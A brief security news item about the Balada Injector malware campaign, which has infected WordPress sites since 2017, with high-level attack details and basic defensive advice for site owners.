Over one million WordPress websites are estimated to have been infected with Balada Injector, a malware campaign that has been active since 2017. The attackers leverage known and recently discovered theme and plugin vulnerabilities to breach WordPress sites, playing out the attacks in waves every few weeks. The attackers are known for their preference for String.fromCharCode obfuscation and the use of freshly registered domain names to host malicious scripts on random subdomains. The malware generates fake WordPress admin users, harvests data stored in the underlying hosts, and leaves backdoors for persistent access. The attackers also search for tools like adminer and phpmyadmin that could have been left behind by site administrators, read or download arbitrary site files, and compromise other sites that share the same server account and file permissions.
WordPress users are advised to keep their website software up-to-date, remove unused plugins and themes, and use strong WordPress admin passwords.
More about malware you can read here.
Commenti